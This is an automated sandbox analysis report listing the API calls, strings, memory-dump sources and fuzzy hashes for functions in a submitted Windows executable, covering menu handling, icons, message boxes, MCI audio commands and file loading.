                                                            • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                            • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                            • GetMenuItemCount.USER32 ref: 00468CFD
                                                            • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                            • GetCursorPos.USER32(?), ref: 00468D3F
                                                            • SetForegroundWindow.USER32(?), ref: 00468D49
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                            • String ID: 0
                                                            • API String ID: 1441871840-4108050209
                                                            • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                            • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                            • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                            • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                            Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                            • __swprintf.LIBCMT ref: 00460915
                                                            • __swprintf.LIBCMT ref: 0046092D
                                                            • _wprintf.LIBCMT ref: 004609E1
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 3631882475-2268648507
                                                            • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                            • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                            • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                            • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                            Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                            • SendMessageW.USER32 ref: 00471740
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                            • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                            • SendMessageW.USER32 ref: 0047184F
                                                            • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                            • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                            • String ID:
                                                            • API String ID: 4116747274-0
                                                            • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                            • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                            • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                            • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                            Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                            • _wcslen.LIBCMT ref: 00461683
                                                            • __swprintf.LIBCMT ref: 00461721
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                            • GetDlgCtrlID.USER32(?), ref: 00461869
                                                            • GetWindowRect.USER32(?,?), ref: 004618A4
                                                            • GetParent.USER32(?), ref: 004618C3
                                                            • ScreenToClient.USER32(00000000), ref: 004618CA
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                            • String ID: %s%u
                                                            • API String ID: 1899580136-679674701
                                                            • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                            • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                            • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                            • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                            Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                            • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu$Sleep
                                                            • String ID: 0
                                                            • API String ID: 1196289194-4108050209
                                                            • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                            • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                            • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                            • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                            Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0043143E
                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                            • SelectObject.GDI32(00000000,?), ref: 00431466
                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                            • String ID: (
                                                            • API String ID: 3300687185-3887548279
                                                            • Opcode ID: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                            • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                            • Opcode Fuzzy Hash: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                            • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                            Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                            • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 1976180769-4113822522
                                                            • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                            • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                            • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                            • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                            Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                            • String ID:
                                                            • API String ID: 461458858-0
                                                            • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                            • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                            • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                            • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                            Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                            • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                            • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                            • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                            • DeleteObject.GDI32(?), ref: 004301D0
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3969911579-0
                                                            • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                            • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                            • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                            • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                            Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                            • String ID: 0
                                                            • API String ID: 956284711-4108050209
                                                            • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                            • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                            • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                            • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                            Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 1965227024-3771769585
                                                            • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                            • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                            • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                            • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                            Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove_wcslen
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 369157077-1007645807
                                                            • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                            • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                            • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                            • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                            Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32 ref: 00445BF8
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                            • __wcsicoll.LIBCMT ref: 00445C33
                                                            • __wcsicoll.LIBCMT ref: 00445C4F
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
